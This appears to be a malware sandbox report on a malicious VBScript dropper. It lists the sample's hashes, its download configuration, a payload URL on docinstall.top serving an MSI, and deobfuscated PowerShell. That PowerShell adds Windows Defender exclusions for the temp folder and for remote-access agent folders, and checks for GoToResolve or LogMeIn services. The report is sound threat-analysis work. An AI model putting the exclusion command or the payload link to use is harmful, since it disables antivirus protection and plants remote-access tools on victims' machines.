Malicious

452a6a6418d71db8b812ab342ac46f6f

VBScript
|
MD5: 452a6a6418d71db8b812ab342ac46f6f
|
Size: 7.37 KB
|
text/vbscript

Print

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	452a6a6418d71db8b812ab342ac46f6f
Sha1	5ebdf8da43368a0741d8d06f9893d1781d501003
Sha256	fc51071791ed9c91dc0b685d807ec877cb0d9177dea77292dde9b895f61fa67a
Sha384	291a9b539bb37dfd7e3c2686207fadb37dcba27a1f6ba4fa9c4bdcde1332a21aa541b5384a00cd91b4f12e6e61d66350
Sha512	40339b354cc8a859033e02e9c2001772ec564a1fe8051b5d5cbd7396fbfbcccaeacf5d0e839da2419a92cdf16be4da8e42c03e33f77de52b5d3e1aba93ce4faf
SSDeep	192:K2yXipkZ4o/6/zc/e/3v7E/e/UBl7/yRGYt/r/6ksm/3:ByXim+ZyqKs
TLSH	3DE1A74B640702B4C57385BBA577261EF85521176B441424FBDD8A91CF3CB2EB3E50EA

File Structure

Malware Configuration - DownloadFile@0x00F0

Config. Field0	Value
Payload URI	& cacheBustedUrl &
Payload Destination	& tmpFile &

Malware Configuration - DownloadFile@0x00F8

Config. Field0	Value
Payload URI	& cachebustedurl &
Payload Destination	tmpfile & @(

Malware Configuration - DownloadFile@0x002D

Config. Field0	Value
Payload URI	& cachebustedurl &
Payload Destination	tmpfile & @(

Artefacts

Name0	Value
URLs in VB Code - #1	http://docinstall.top/new/LogM.msi
Deobfuscated PowerShell	Add-MpPreference -ExclusionPath @("$env:TEMP", "C:\Program Files\TacticalAgent", "C:\Program Files (x86)\GoToResolve", "C:\ProgramData\TacticalAgent", "C:\Program Files\Mesh Agent")
Deobfuscated PowerShell	$s = Get-Service \| Where-Object $_."DisplayName" -like "GoToResolve" -or $_."DisplayName" -like "LogMeIn" if ($s."Status" -eq "Running") { exit 0 } else { exit 1 }

452a6a6418d71db8b812ab342ac46f6f (7.37 KB)

An error has occurred. This application may no longer respond until reloaded. Reload 🗙